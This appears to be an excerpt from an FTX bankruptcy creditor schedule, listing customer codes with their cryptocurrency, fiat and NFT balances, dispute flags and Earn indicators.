| 07421366 | | BAT[14.54603731], BCH[.00132107], BRZ[3], BTC[.00008897], CUSDT[15], DAI[0.00215889], DOGE[247.95441799], LTC[.05570979], NFT [512332813465247593/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #20/(1), SUSHI[.76391038], TRX[286.20531374], USD[0.00] | Yes | |
| 07421375 | | BTC[.00082318], CUSDT[1], DOGE[60.51309149], USD[0.00] | | |
| 07421384 | | ETH[0], ETHW[0], USDT[11.1226701] | | |
| 07421387 | | ETH[0], ETHW[0], USD[2.00] | | |
| 07421388 | | BAT[1], BRZ[4], DOGE[.10558472], ETH[.00000001], MATIC[158.98181723], NFT [527218806592127934/Mad Lions Remastered #33/(1), TRX[10], USD[0.01], USDT[0] | Yes | |
| 07421389 | | BTC[0], DOGE[.316], ETH[.00025262], ETHW[.00025261], LINK[.08834999], MATIC[8], SHIB[70000], SOL[.0053], SUSHI[.27], TRX[.872], USD[0.12] | | |
| 07421393 | | USD[0.21] | | |
| 07421394 | | BTC[1.664636991], ETH[5.8040488], ETHW[5.8040488], LINK[155.65199], MATIC[3706.4755], SOL[92.368], SUSHI[280], USD[168.77] | | |
| 07421398 | | USD[0.01] | | |
| 07421411 | | ETH[.00000001], SOL[0], USD[0.00] | | |
| 07421413 | | BRZ[1], BTC[.03636484], CUSDT[8], ETH[.18621408], ETHW[.18597608], TRX[2], USD[0.00] | Yes | |
| 07421424 | | CUSDT[8], USD[0.00], USDT[1] | | |
| 07421429 | | DOGE[69.47702287], ETH[0], USD[0.00] | | |
| 07421432 | | ALGO[0], AUD[0.00], AVAX[0], BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CHF[0.00], DAI[0], DOGE[0], ETH[0], ETHW[0.00001827], EUR[0.00], GBP[0.00], GRT[0], HKD[0.00], LTC[0], MKR[0], MXN[0.00], NEAR[0], PAXG[0], SGD[0.00], SHIB[0], SOL[0.00000002], SUSHI[0.00012939], USD[0.00], USDT[0.000000450] | Yes | |
| 07421441 | | BTC[.0096], ETHW[.533], SOL[30.79840733], USD[0.43] | | |
| 07421450 | | USD[0.01] | | |
| 07421453 | | BRZ[1], DOGE[2], TRX[4], USD[0.00], USDT[1.10421193] | Yes | |
| 07421456 | | AVAX[0], BAT[4.12844141], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[.00000109], USD[0.28], USDT[0.00000015] | Yes | |
| 07421458 | | CUSDT[12], TRX[3], USD[0.00] | | |
| 07421459 | | SOL[0], USDT[0.00000015] | | |
| 07421461 | Contingent, Disputed | USD[0.00] | | |
| 07421466 | | CUSDT[1], USD[0.00] | | |
| 07421468 | | BAT[1.0165555], BRZ[2], DOGE[1], TRX[15190.04655667], USD[15.93] | Yes | |
| 07421475 | | DOGE[1312.786], USD[0.08] | | |
| 07421477 | | NFT [569227140907628680/The Hill by FTX #147/(1] | | |
| 07421483 | | TRX[1], USD[0.01] | | |
| 07421484 | | DOGE[237.23697515], LTC[0], SOL[0], USD[0.01], USDT[0.11843024] | | |
| 07421485 | | BRZ[2], CUSDT[10], DOGE[1.00387002], ETH[.02252022], ETHW[.02224296], GRT[1.00498957], KSHIB[0], SOL[4.84749602], TRX[3], USD[0.01] | Yes | |
| 07421487 | | TRX[1], USD[0.00], USDT[1] | | |
| 07421491 | | CUSDT[3], DOGE[1562.55947184], GRT[1], USD[0.00] | | |
| 07421502 | | BAT[1.01655514], BRZ[4], CUSDT[13], ETH[.42712317], ETHW[.42694377], GRT[1.00498957], LINK[24.01619268], SOL[42.07938691], TRX[5], USD[0.00], USDT[1.10343539] | Yes | |
| 07421510 | | SOL[.00000819], USD[0.00] | | |
| 07421520 | | BRZ[2], CUSDT[3], DOGE[1], USD[4.18], USDT[2] | | |
| 07421521 | | CUSDT[12], SHIB[2], TRX[1], USD[0.00] | | |
| 07421522 | | CUSDT[1], USD[0.00] | | |
| 07421524 | | DOGE[4], LINK[12.97847778], USD[0.00] | | |
| 07421530 | | DOGE[1], ETH[.10993343], ETHW[.10993343], USD[0.00] | | |
| 07421539 | | BAT[1.22414061], CUSDT[4], DOGE[.00004813], SGD[0.00], USD[0.01] | | |
| 07421540 | | DOGE[2], USD[0.00] | Yes | |
| 07421542 | | DOGE[1], USD[0.00] | | |
| 07421544 | | AAVE[0], BCH[0], BRZ[0], DAI[0], DOGE[0], ETH[0], MATIC[0], PAXG[0], SOL[0], SUSHI[0.37059934], TRX[0], USD[0.09], USDT[0.00000119] | Yes | |
| 07421549 | | DOGE[0], ETH[0], LINK[0], SOL[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07421555 | | USD[0.12] | | |
| 07421558 | | BTC[.0005] | | |
| 07421563 | | AAVE[.0071], DOGE[ 506], USD[0.00] | | |
| 07421577 | | USD[0.00] | | |
| 07421584 | | NFT [399318542197824340/Entrance Voucher #6110/(1] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07421586 | | USD[0.01], USDT[11.98711941] | Yes | |
| 07421587 | | BTC[.0001] | | |
| 07421608 | | AVAX[7.8444294], BAT[3.17124035], BRZ[13.64523546], BTC[.00000128], CUSDT[58.7853257], DOGE[658.2514447], ETHW[1.27561993], GRT[1], SHIB[8134610.06775478], TRX[26.14048619], USD[11687.72], USDT[0] | Yes | |
| 07421621 | | BRZ[3], CUSDT[4], GRT[2], TRX[3], USD[0.00], USDT[0] | | |
| 07421629 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07421633 | | BTC[.000194], DOGE[1] | | |
| 07421654 | | BAT[1], BRZ[2], CUSDT[8], TRX[2], USD[0.00], USDT[1] | | |
| 07421658 | | ETH[0], USD[0.59], USDT[.003] | | |
| 07421664 | | BAT[1], CUSDT[6], USD[0.01] | | |
| 07421669 | | USD[0.00], USDT[248.85278095] | | |
| 07421670 | | LTC[10.40941439], USD[1978.00] | | |
| 07421672 | | DOGE[4632.45778760], TRX[.82013619], USD[0.00] | Yes | |
| 07421676 | | USD[248.06] | | |
| 07421679 | | BTC[.00004328], SOL[.0595], USD[0.00] | | |
| 07421680 | | DAI[0], DOGE[0], LTC[0], SOL[0], TRX[0] | | |
| 07421681 | | BTC[.00000366], TRX[48.25392750], USD[0.07] | | |
| 07421682 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07421684 | | BRZ[1], CUSDT[2], DOGE[21.22380921], SOL[109.224797], TRX[9588.90192857], USD[0.00] | | |
| 07421686 | | BTC[0], EUR[0.00], USD[0.07] | | |
| 07421690 | | BTC[.00360948] | | |
| 07421696 | | TRX[1], USD[0.00] | | |
| 07421704 | | SOL[0], USD[0.00] | | |
| 07421708 | | LTC[.00273736], USD[9.22] | | |
| 07421710 | | DOGE[3984], ETH[.39384025], ETHW[.39384025], USD[11.06] | | |
| 07421711 | | BTC[0.00000121], DOGE[0], ETH[0.00032089], ETHW[0.00032089], SOL[0.00008400], TRX[0], USD[0.00], USDT[0], YFI[.000081] | | |
| 07421719 | | BCH[0], BRZ[3], BTC[0], CUSDT[7], DOGE[3], ETH[0], TRX[5], USD[0.00], USDT[1.09386412] | Yes | |
| 07421720 | | BRZ[1], CUSDT[17], DOGE[17.28625877], ETH[.0000001], ETHW[0], USD[0.00], USDT[0.60000000] | | |
| 07421732 | | ETH[.0011152], ETHW[.0011152], TRX[1], USD[0.00] | | |
| 07421734 | | CUSDT[1], DOGE[4.52206114], ETH[.00125051], ETHW[.00123683], USD[0.01] | Yes | |
| 07421735 | | ETHW[.23277865], USD[2.55] | | |
| 07421737 | | BTC[0], SOL[0.04765098], SUSHI[1.984], USD[16703.68], USDT[3812.40298596] | | |
| 07421738 | | TRX[1], USD[0.00], USDT[0] | | |
| 07421739 | | CUSDT[2], DOGE[477.42619792], SOL[6.98475774], USD[0.00] | Yes | |
| 07421741 | | BRZ[1], CUSDT[1], TRX[4289.04970317], USD[5.36] | | |
| 07421742 | | DOGE[.97378671], USD[1.75] | | |
| 07421743 | | CUSDT[5], GRT[190.5569351], TRX[69.6812432], USD[0.00] | | |
| 07421744 | | CUSDT[1], DOGE[.00000068], USD[1.00] | | |
| 07421746 | | LTC[.00585411], USD[0.00], USDT[.007123] | | |
| 07421748 | | BAT[3.48866336], BRZ[6.06832771], CUSDT[58.41274868], DOGE[39.85530194], ETHW[.00102653], ETHW[.00101285], GRT[2.43078893], LINK[.19969808], MATIC[8.02788184], SOL[.0038958], SUSHI[1.07550729], TRX[136.99286204], UNI[.13655851], USD[0.00], USDT[2.18392962] | Yes | |
| 07421759 | | BAT[1.0165555], DOGE[5832.08298041], TRX[1], USD[0.00] | Yes | |
| 07421761 | | DOGE[2], USD[37.15] | | |
| 07421766 | | USD[0.35] | | |
| 07421768 | | BTC[0], ETH[0], LTC[.28293183], TRX[.000038], USD[0.54], USDT[120.20000016] | | |
| 07421770 | | BTC[0.00114070], CUSDT[1], DOGE[1774.52963247], LINK[1.16224112], LTC[0], SHIB[2], TRX[1], USD[0.00], YFI[0] | | |
| 07421771 | | CUSDT[14], DOGE[1], ETH[.00000001], ETHW[0], GRT[3], TRX[9], USD[0.00], USDT[5] | | |
| 07421772 | | BTC[.34561336], ETHW[2.884], MATIC[9.55], SOL[.00546961], USD[614.58], USDT[.7253842] | | |
| 07421775 | | USD[0.00] | | |
| 07421781 | | BAT[1], BF_POINT[300], BRZ[4], BTC[0], CUSDT[20], DOGE[3], LINK[52.70155355], NFT (553906349193520123/Bahrain Ticket Stub #2479)[1], SHIB[5], SOL[0.00011485], TRX[4.00000100], USD[16017.93], USDT[300.71410913] | Yes | |
| 07421788 | | DOGE[1], SUSHI[1.28091495], USD[0.00] | | |
| 07421792 | | TRX[1], USD[0.00] | | |
| 07421803 | | CUSDT[10], TRX[1], USD[0.00] | | |
| 07421806 | | ETHW[.00003215], SHIB[2], USD[0.00] | Yes | |
| 07421816 | | TRX[99.27327988], USD[10.00] | | |
| 07421820 | | BTC[.0228084], SOL[22.89204015], USD[1.71] | | |
| 07421824 | | BTC[.00036493], USD[0.00] | Yes | |
| 07421827 | | USD[0.00], USDT[0] | | |
| 07421832 | | BTC[0], USD[2.81] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07421833 | | BAT[1.0165555], BRZ[1], CUSDT[6], TRX[7], USD[0.00], USDT[2.19637624] | Yes | |
| 07421836 | | BTC[0], ETH[2.43752150], ETHW[2.43752150], MATIC[476.97184143], SOL[33.48593484], USD[0.00] | | |
| 07421844 | | BRZ[1], CUSDT[19.65176639], SHIB[1], USD[0.00] | | |
| 07421851 | | BRZ[2], BTC[.02595302], CUSDT[8], DOGE[3], ETH[.04003324], ETHW[.35432103], TRX[2.23433738], USD[5.89], USDT[57.93409331] | Yes | |
| 07421860 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07421861 | | BTC[.006972], USD[217.81] | | |
| 07421864 | | CUSDT[7], TRX[5], USD[0.01], USDT[0] | | |
| 07421866 | | CUSDT[1], DOGE[0], TRX[2], USD[0.00], USDT[1] | | |
| 07421867 | | SOL[0.99626253], USD[1033116.43], USDT[0] | | |
| 07421869 | | CUSDT[25], DOGE[2.00257081], GRT[1.76075582], SHIB[10395.86475095], TRX[41.19893851], USD[0.00] | Yes | |
| 07421873 | | USD[0.00] | | |
| 07421874 | | BAT[1], BRZ[1], CUSDT[11], DOGE[.58860774], TRX[1.90083869], USD[0.67] | | |
| 07421877 | | CUSDT[1], DOGE[4], ETH[1.00644003], ETHW[1.00644003], TRX[1], USD[0.00] | | |
| 07421880 | | USD[0.66], USDT[0.00000001] | | |
| 07421892 | | DOGE[.996], SOL[0], TRX[.552], USD[0.00], USDT[0] | | |
| 07421898 | | BRZ[1], CUSDT[1], GRT[1.00498957], USD[5.54] | Yes | |
| 07421911 | | NFT (384225719777147473/Jaclyn Auer IV)[1], SOL[0] | | |
| 07421913 | | BF_POINT[300], BRZ[1], BTC[0.00010834], CUSDT[125.37258214], DOGE[8.52499872], MATIC[5.79971840], SHIB[166183.35315079], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07421915 | | TRX[1], USD[0.00] | | |
| 07421920 | | CUSDT[447.86925123], TRX[1], USD[0.07] | | |
| 07421921 | | SOL[0], USD[0.00], USDT[0.00000041] | | |
| 07421925 | | BTC[.01546683], ETH[.46181338], SHIB[5], TRX[4], USD[1018.39] | | |
| 07421929 | | CUSDT[1], USD[0.01] | | |
| 07421930 | | BTC[0], CUSDT[7], USD[0.75] | Yes | |
| 07421931 | | BAT[7.36654983], CUSDT[1], DOGE[127.56693947], ETH[.00351722], ETHW[.00347618], KSHIB[133.70421098], LTC[.02446965], PAXG[.00318947], SOL[.0255108], TRX[110.48712809], USD[10.87], USDT[5.51669607], YFI[.00042663] | Yes | |
| 07421932 | | USD[0.00] | | |
| 07421945 | | BTC[0], SOL[.033], USD[0.00], USDT[0] | | |
| 07421946 | | CUSDT[2], DOGE[291.60545531], USD[0.14] | | |
| 07421951 | | SOL[.0516], USD[0.43] | | |
| 07421957 | | USD[541.72] | Yes | |
| 07421962 | | CUSDT[26], SOL[.00000584], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |
| 07421972 | | BRZ[2], CUSDT[11], DOGE[2792.87303985], GRT[587.56664448], LINK[74.61079559], SUSHI[182.38146298], TRX[1], UNI[30.57534944], USD[198.75], USDT[2] | | |
| 07421975 | | LINK[0], SGD[0.00], SOL[0], SUSHI[0], USD[0.00] | | |
| 07421976 | | BCH[.00363613], BTC[.00008726], CUSDT[148.84653754], DOGE[1], ETH[.00227574], ETHW[.00224838], GBP[1.50], LTC[.03126193], PAXG[.00181883], SOL[.1409216], USD[0.00] | Yes | |
| 07421979 | | BCH[2.99594195], BRZ[1], DOGE[1], UNI[9.56242584], USD[0.00] | | |
| 07421984 | | BCH[0], BRZ[4], BTC[0], CUSDT[10], DOGE[115.89638842], ETH[0], GRT[0], PAXG[0], SHIB[4638714.94122757], SOL[0], SUSHI[0], TRX[0.01447284], USD[0.00], USDT[1.06241825], YFI[0] | Yes | |
| 07421992 | | BTC[.08899073], USD[0.02] | | |
| 07421994 | | BAT[1], BRZ[2], CUSDT[6], DOGE[0], ETH[0], ETHW[0.61048219], GRT[1], SHIB[1], TRX[2], USD[720.53] | | |
| 07421998 | | BTC[.00018957] | | |
| 07421999 | | BAT[1], DOGE[1], USD[0.00] | | |
| 07422000 | | BTC[0.00003553] | | |
| 07422004 | | BAT[0], BRZ[1], CUSDT[9], DOGE[3], ETH[0], GRT[1.00367791], MATIC[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07422009 | | ALGO[8.04147744], AVAX[1.3908594], BTC[0.00170000], ETH[.024], ETHW[.024], MATIC[45.31019991], NEAR[7.68149467], SOL[1.02241683], USD[0.00] | | |
| 07422013 | | BTC[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07422016 | | CUSDT[3], DOGE[866.25800462], GRT[6.4629655], USD[0.00], USDT[0] | | |
| 07422028 | | USD[0.00] | Yes | |
| 07422032 | | BTC[.00003943], USDT[373.6641832] | | |
| 07422036 | | AUD[0.00], BTC[0], CAD[0.00], ETH[0.00096971], ETHW[0.00096971], GBP[0.00], MATIC[0.99004101], NFT (368169942662520000/2974 Floyd Norman - CLE 6-0211)[1], NFT (481791222242481819/The 2974 Collection #0405)[1], NFT (523385078779088696/Birthday Cake #0405)[1], PAXG[0], USD[69.60], USDT[0], WBTC[0.00004368] | | |
| 07422039 | | BTC[.00031329] | | |
| 07422042 | | USD[3.04] | | |
| 07422043 | | BRZ[1], USD[0.00], USDT[0] | | |
| 07422044 | | CUSDT[15], DOGE[82.15042399], ETH[.10023297], ETHW[.09919969], GRT[304.29282483], MATIC[133.99433608], SUSHI[30.49696033], TRX[461.83187173], UNI[15.40364194], USD[0.00] | Yes | |
| 07422048 | | CUSDT[1], DOGE[46.68158215], USD[0.00] | | |
| 07422049 | | BTC[0.00003853], ETH[.0003893], ETHW[.0003893], USD[0.00] | | |
| 07422050 | | BTC[.00257989], DOGE[1], LINK[1.00977733], SHIB[2], USD[0.00], USDT[0.00002514] | | |
| 07422051 | | USD[1.31] | | |
| 07422056 | | USD[0.00] | | |
| 07422057 | | BAT[20.16329222], BTC[0], CUSDT[8], TRX[2], USD[0.00], USDT[0.00002248] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07422061 | | USD[0.00] | | |
| 07422062 | | CUSDT[1], USD[0.00] | | |
| 07422072 | | BRZ[1], BTC[0.00005708], CUSDT[5.66233555], DOGE[1], ETH[0], ETHW[0], TRX[0], USD[0.02] | | |
| 07422074 | | AAVE[0], AUD[0.00], BTC[0], CAD[0.00], ETH[0], ETHW[0], GBP[0.00], GBP[0.00], GRT[0], LTC[0], PAXG[0], SOL[0], USD[0.00], YFI[0] | | |
| 07422077 | | CUSDT[3], ETH[0], ETHW[0.17785358], NFT [4091706280496316653/FTX - Off The Grid Miami #2372][1], TRX[1], USD[0.02] | Yes | |
| 07422082 | | MATIC[0.00000001], USD[0.00] | | |
| 07422098 | | BF_POINT[300], BRZ[1], CUSDT[6.00002857], DOGE[564.77899843], GRT[.00002734], SHIB[7370581.05724831], TRX[1.00445005], USD[0.21] | | |
| 07422099 | | BRZ[1], CUSDT[2], DOGE[71.66909646], USD[0.00] | | |
| 07422103 | | BRZ[2], BTC[.00074197], CAD[1.25], CUSDT[107.61036258], DOGE[331.12275635], SHIB[30222313.85572048], TRX[627.6194757], USD[0.07] | | |
| 07422104 | | BAT[10.08316633], CUSDT[10], DOGE[1], GRT[89.99069371], SOL[2.69777521], SUSHI[14.74481157], TRX[2744.32047895], UNI[4.32212147], USD[0.00] | Yes | |
| 07422106 | | BRZ[1], CUSDT[1], DOGE[3], TRX[2], USD[0.00] | | |
| 07422112 | | ETH[.00031], ETHW[.00031], USD[0.98] | | |
| 07422118 | | BRZ[.97507097], CUSDT[249.61711465], DAI[.58957147], SHIB[6], SOL[1.47202202], SUSHI[.00003267], TRX[1], USD[0.00] | Yes | |
| 07422119 | | CUSDT[1], SHIB[272182.90691344], USD[0.00] | | |
| 07422125 | | BRZ[1], CUSDT[2], DOGE[4], TRX[1], USD[0.00] | | |
| 07422128 | | BCH[0], BTC[0], DOGE[.867], USD[0.00], USDT[0] | | |
| 07422130 | | ETH[.00000258], ETHW[.00000258], USD[0.00] | | |
| 07422137 | | BTC[.00010567] | | |
| 07422148 | | CUSDT[5], LINK[.24720283], SUSHI[15.69284045], TRX[940.32976848], USD[0.60], USDT[1] | | |
| 07422149 | | DOGE[1], SHIB[3], USD[227.89] | Yes | |
| 07422158 | | CUSDT[1], DOGE[5], GRT[1], TRX[2], USD[0.00] | | |
| 07422163 | | USD[0.00] | Yes | |
| 07422165 | | BAT[8363.0386], DOGE[.89], LTC[62.12856], MATIC[7.94, SHIB[919300], SOL[.0075], SUSHI[.1524], TRX[.273], USD[1.70], USDT[.03123204] | | |
| 07422168 | | BTC[.14059261], ETH[.0919], ETHW[.0919] | | |
| 07422177 | | CUSDT[7], TRX[2], USD[0.01], USDT[0] | | |
| 07422182 | | USD[0.81] | | |
| 07422185 | | BRZ[1], CUSDT[4], DOGE[1], SOL[0], SUSHI[10.33856798], USD[0.00] | Yes | |
| 07422189 | | BTC[0], LINK[0], SOL[0], USD[0.00], USDT[0] | | |
| 07422204 | | TRX[0], USD[2479.63] | | |
| 07422206 | | BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0.00000001], USD[0.02], USDT[0] | | |
| 07422216 | | BTC[0], SOL[0.00523015], SUSHI[0.33250138], USD[2.82], USDT[.16443575] | | |
| 07422218 | | CUSDT[16], DOGE[6.25834655], LTC[2.25708366], TRX[4], USD[0.00] | | |
| 07422229 | | AAVE[0], BCH[0], BTC[0], CUSDT[3], DOGE[1], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07422234 | | BTC[.000009], USDT[.72] | | |
| 07422235 | | USD[0.00], USDT[1] | | |
| 07422245 | | USD[0.01] | | |
| 07422251 | | BTC[.00000001] | | |
| 07422255 | | BTC[.03778088], DOGE[1], GRT[1.00498957], SOL[.00000622], USD[0.00] | Yes | |
| 07422264 | | DOGE[59.83121375], USD[0.00] | | |
| 07422268 | | DOGE[0], USD[0.00], USDT[0.00000001] | | |
| 07422270 | | DOGE[58935.1847658], USD[0.00], USDT[0] | Yes | |
| 07422289 | | CUSDT[7], DOGE[442.95552276], LTC[.24179481], USD[0.00] | | |
| 07422299 | | USD[0.61] | | |
| 07422300 | | BTC[0], DOGE[0.02015530], ETH[0], USD[0.00] | | |
| 07422301 | | NFT [325039160145194583/Romeo #1059][1] | | |
| 07422302 | | USD[0.89] | | |
| 07422307 | | BAT[1.20453063], BRZ[5.52087739], CUSDT[94.34865696], DAI[.99064515], DOGE[1], GRT[1.08927802], SOL[1.01315683], TRX[38.14337139], USD[21.00] | | |
| 07422310 | | BAT[0], BRZ[1], CUSDT[4], DAI[0], DOGE[1], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07422322 | | ETH[.13375924], SHIB[3], USD[0.06] | Yes | |
| 07422323 | | AUD[0.22], BCH[.00031694], BF_POINT[200], BRZ[3], CUSDT[6.09757302], DOGE[1.38039783], EUR[0.00], GRT[2.02873399], SGD[0.04], SHIB[120590.89538739], SOL[.00773892], SUSHI[.0007715], TRX[7.08466283], UNI[.00016122], USD[0.29], USDT[4.53478537] | | |
| 07422330 | | AVAX[2.8971], ETH[0], ETHW[0], LINK[13.794], NFT [418232784223391863/Entrance Voucher #1615][1], SOL[4.08397000], USD[0.37], USDT[0] | | |
| 07422334 | | USD[0.00] | | |
| 07422338 | | CUSDT[4], TRX[2], USD[0.00], USDT[1] | | |
| 07422349 | | DOGE[2198.79997778], GRT[1], TRX[1], USD[0.91] | | |
| 07422351 | | BAT[1], BRZ[2], CUSDT[6], DOGE[1], ETH[0], ETHW[2.73672633], LINK[1], SHIB[2], TRX[10], USD[0.01], USDT[1] | | |
| 07422356 | | BTC[.01671287], TRX[1], USD[0.00] | | |
| 07422357 | | USD[0.01] | | |
| 07422378 | | TRX[.096], USD[0.03] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07422390 | | BRZ[1], CUSDT[1], USD[0.26] | | |
| 07422394 | | BAT[2], BRZ[2], BTC[0], CUSDT[8], DOGE[0], ETH[0], ETHW[0], GRT[2], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0.00000001], YFI[0] | | |
| 07422398 | | CUSDT[4], DOGE[48.03157841], ETH[.00313804], ETHW[.00313804], GRT[14.7913536], TRX[67.47675993], UNI[1.00350784], USD[0.00] | | |
| 07422399 | | BTC[0], TRX[1], USD[0.00] | | |
| 07422411 | | BRZ[2], CUSDT[7], TRX[1], USD[0.00] | | |
| 07422412 | | BAT[0], BCH[.00000223], BTC[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07422419 | | SOL[7.86076489] | | |
| 07422421 | | DOGE[84.05802559], USD[0.00] | | |
| 07422423 | | USD[100.00], USDT[0] | | |
| 07422435 | | CUSDT[1], DOGE[1346.22906082], USD[0.00] | Yes | |
| 07422438 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07422441 | | AAVE[.48482535], AUD[56.68], BAT[97.39017068], BCH[.27504001], BRZ[692.1333703], CUSDT[7829.76778644], DAI[66.0462556], DOGE[132.8048351], EUR[45.05], GBP[30.96], GRT[138.09414692], LINK[3.64964809], MATIC[62.43533212], MKR[.00729759], PAXG[.06130274], SHIB[84598.86421387], SOL[5.37605662], SUSHI[5.4293463], TRX[2059.8541586], UNI[4.41742385], USD[0.00], USDT[47.04395845] | Yes | |
| 07422442 | | BTC[0], ETHW[.00047567], NFT (374609490265499704/933)[1], NFT (393514046562753328/817)[1], NFT (449092501263956555/616)[1], NFT (544384971426423891/Entrance Voucher #2099)[1], SOL[0], USD[2.76], USDT[0.00017271] | | |
| 07422444 | | ETH[0], USD[0.93] | | |
| 07422445 | | CUSDT[4], TRX[172.79797068], USD[0.01] | | |
| 07422450 | | BRZ[1], CUSDT[1], GRT[1.00307037], LTC[.00002591], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07422451 | | BRZ[1], DOGE[1], ETH[0], ETHW[0], LTC[0], TRX[4398.06614186], USD[0.00] | Yes | |
| 07422455 | | BRZ[1], CUSDT[7], DAI[0], DOGE[1], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07422457 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07422461 | | BTC[0.11406340], ETH[.33792], ETHW[.33792], USD[0.01], USDT[.6957668] | | |
| 07422462 | | BAT[.624], BTC[0.00002918], NFT (538493665550508814/Coachella x FTX Weekend 1 #30237)[1], SUSHI[.21], USD[1.71] | | |
| 07422463 | | CUSDT[.00499396], DOGE[1], SHIB[1], USD[0.01] | | |
| 07422465 | | USD[0.00] | | |
| 07422472 | | USD[0.00] | | |
| 07422476 | | BTC[0], USD[0.01], USDT[0] | | |
| 07422477 | | BAT[0], DOGE[0], ETH[0], ETHW[0], PAXG[0], UNI[0], USD[0.01], USDT[0.00000001] | | |
| 07422485 | | CUSDT[4], DOGE[1], GRT[2.71044984], TRX[.72530734], USD[0.19] | Yes | |
| 07422491 | | DOGE[1.96812934], USD[0.19] | | |
| 07422493 | | DOGE[854.89708647], ETH[0.11470496], ETHW[0.11470496], TRX[1], USD[0.18] | | |
| 07422495 | | TRX[4.99621245], USD[0.00] | | |
| 07422496 | | SHIB[5], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07422509 | | BRZ[1], CUSDT[3], DOGE[1], ETH[.25133818], ETHW[.25133818], GRT[1], USD[0.00], USDT[2] | | |
| 07422510 | | BAT[2.04774344], BF_POINT[100], BRZ[9.43182459], CUSDT[11], DOGE[3], ETH[0.00002390], ETHW[0.00002390], GRT[2.0039414], MATIC[.00316584], SHIB[347.43451028], TRX[24.8697872], USD[1.93], USDT[11.06888251] | Yes | |
| 07422511 | | NFT (292633490796271449/Baku Ticket Stub #247)[1], NFT (314135312118572283/FTX Crypto Cup 2022 Key #57)[1], NFT (373656331862459349/Humpty Dumpty #1001)[1], NFT (411083413604482445/Series 1: Wizards #410)[1], NFT (418210348342158052/FTX - Off The Grid Miami #568)[1], NFT (420508931959045188/Barcelona Ticket Stub #336)[1], NFT (425747166054361896/Hungary Ticket Stub #324)[1], NFT (434517888588640866/Entrance Voucher #1495)[1], NFT (441708704399322678/Belgium Ticket Stub #171)[1], NFT (450214053867491756/Series 1: Capitals #449)[1], NFT (488942156510589021/Silverstone Ticket Stub #280)[1], NFT (490556379047262447/Saudi Arabia Ticket Stub #641)[1], NFT (500864317490620271/France Ticket Stub #14)[1], NFT (517057925004313635/Austria Ticket Stub #97)[1], NFT (544331470866708148/Montreal Ticket Stub #96)[1], NFT (547846936855312922/The Hill by FTX #538)[1], USD[0.00] | Yes | |
| 07422514 | | BTC[0], ETH[0], LTC[0], USD[1.90], USDT[0] | | |
| 07422516 | | USD[0.01] | | |
| 07422518 | | BRZ[1], DOGE[0], ETH[0.16492078], SHIB[44257976.29455935], SOL[0], USD[236.67], USDT[0.00000757] | Yes | |
| 07422523 | | SOL[0.00929000], USD[0.00], USDT[0] | | |
| 07422524 | | BTC[0], MATIC[0], USD[99.49] | | |
| 07422525 | | ETH[.00000006] | | |
| 07422538 | | BTC[0], GRT[.78], LTC[.01082], USD[5.34] | | |
| 07422548 | | DOGE[61.76609144], TRX[1], USD[0.00] | | |
| 07422553 | | BRZ[5], CUSDT[6], DOGE[38.59411674], ETH[.17077775], ETHW[.17077775], TRX[4], USD[0.00] | | |
| 07422556 | | BRZ[1], CUSDT[1], TRX[2], USD[0.01] | | |
| 07422560 | | USD[0.40] | | |
| 07422561 | | BTC[.00165036], TRX[1], USD[0.00] | | |
| 07422566 | | CUSDT[1], DOGE[4.05213569], ETH[.07901889], ETHW[.07803895], PAXG[.06302212], TRX[1], USD[0.72] | Yes | |
| 07422569 | | DOGE[2.00000024], SOL[.00011925], USD[0.00] | | |
| 07422571 | | BTC[.00093817], CUSDT[1], DOGE[95.61267252], TRX[1], USD[0.00] | Yes | |
| 07422572 | | BRZ[1], BTC[.01521544], CUSDT[2], DOGE[11554.49276870] | Yes | |
| 07422576 | | NFT (509991966536906990/FTX - Off The Grid Miami #2192)[1] | | |
| 07422577 | | TRX[3], USD[962.92] | | |
| 07422579 | | CUSDT[5], ETH[.16394766], ETHW[.16394766], TRX[1], USD[209.49] | | |
| 07422580 | | BAT[1], BRZ[3], CUSDT[10], DOGE[0], GRT[3], TRX[6], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07422582 | | BTC[0], CUSDT[7], DOGE[52.24959084], USD[0.00] | | |
| 07422592 | | DOGE[1], LTC[16.15051348], USD[0.00] | | |
| 07422594 | | BCH[.00829807], DOGE[85.14204843], USD[0.00] | | |
| 07422597 | | BTC[0.00001493], USD[0.00] | | |
| 07422603 | | BRZ[66.25422674], DOGE[3], SUSHI[1.12679946], USD[0.00] | | |
